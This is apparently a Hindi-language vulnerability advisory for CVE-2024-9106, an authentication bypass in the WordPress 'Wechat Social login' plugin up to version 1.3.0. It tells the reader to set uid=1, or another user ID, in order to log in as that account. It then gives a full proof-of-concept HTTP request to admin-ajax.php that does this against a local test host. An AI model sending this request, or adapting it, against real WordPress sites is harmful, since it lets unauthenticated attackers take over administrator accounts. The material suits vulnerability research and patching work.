
Wechat Social login <= 1.3.0 - प्रमाणीकरण बाईपास
Wechat Social login <= 1.3.0 - प्रमाणीकरण बायपास
वर्डप्रेस के लिए Wechat Social login प्लगइन संस्करण 1.3.0 तक (शामिल) प्रमाणीकरण बायपास के लिए असुरक्षित है। यह सोशल लॉगिन के दौरान प्रदान किए गए उपयोगकर्ता के अपर्याप्त सत्यापन के कारण है। इससे गैर-प्रमाणित हमलावरों के लिए साइट पर किसी भी मौजूदा उपयोगकर्ता (जैसे व्यवस्थापक) के रूप में लॉग इन करना संभव हो जाता है, यदि उनके पास उपयोगकर्ता आईडी तक पहुंच हो। यह केवल तभी शोषण योग्य है जब ऐप सीक्रेट सेट न हो, इसलिए इसका डिफ़ॉल्ट खाली मान होता है। बस uid=1 जोड़ें या आईडी नंबर को उस खाते में बदलें जिसमें आप लॉगिन करना चाहते हैं। केवल wechat के लिए काम करता है।
CVE: CVE-2024-9106
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: wechat-social-login
GET /wp-admin/admin-ajax.php?channel_id=social_weibo&action=xh_social_channel&uid=1&tab=login_redirect_to_authorization_uri&xh_social_channel=8e7bec203c¬ice_str=1773207877&hash=4165e284f73b86c0c642973816d0cd17&redirect_to=http%3A%2F%2Fkubernetes.docker.internal%2Fwp-admin%2F HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive